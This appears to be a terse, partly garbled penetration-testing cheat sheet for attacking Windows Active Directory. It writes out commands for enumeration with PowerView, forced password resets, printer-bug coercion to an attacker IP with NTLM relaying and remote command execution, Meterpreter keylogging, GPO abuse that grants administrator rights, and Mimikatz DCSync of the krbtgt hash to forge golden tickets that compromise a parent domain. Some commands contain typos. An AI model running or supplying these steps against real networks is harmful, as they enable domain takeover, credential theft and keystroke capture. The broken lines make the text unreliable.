Powersploit
BloodHound, check permissions to target
Add-GroupMember "<GroupName>" -Members "<username>"
Get-ADGroupMember -Identity "<GroupName>"
$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force
Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
GWMI Win32_Printer -Computer <domain>
Get-PrinterPort -ComputerName <domain>
nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug
SpoolSample.exe <domain> "$ATTACKER_IP"
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug
migrate <processID>
keyscan_start
keyscan_dump
GPO
has a GUID
GPOs
are stored on the SYSVOL
to be distributed to any machine in the domaincmd
with a AD user and execute mmc
through itrunas /netonly /user:<domain>\<username> cmd.exe
mmc
cmd.exe
via dir \\<domain>\sysvol
File
-> Add/Remove Snap-in -> Group Policy Management
-> OK
Group Policy Management
-> Forest bla
-> Domains
-> <domain>
-> Server
-> Management Servers
and right click to edit the groupComputer Configuration
-> Policies
-> Windows Settings
-> Security Settings
-> right click Restricted Groups
-> Add Group
-> name like IT Support
-> edit the group and Add Administrators
and Remote Desktop Users
groupsDomain Trusts offer access to resources to users in the domain
Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket
krbtgt
as an account signs and encrypts TGTsKRBTGT
via Mimikatz, resulting in Hash NTLM
privilege::debug
lsadump::dsync /user:<username\kbtgt>
Craft the ticket with the help of this hash
Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is S-1-5-21-<RootDomain>-519
Get-ADComputer -Identity "<DCChildCN>"
Get-ADGroup -Identity "Enterprise Admins" -Server <domain>
KERB_VALIDATION_INFO
via Mimikatzprivilege::debug
kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
exit
dir \\DCdomain\dir$
dir \\Parentdomain\dir$
Social_engineering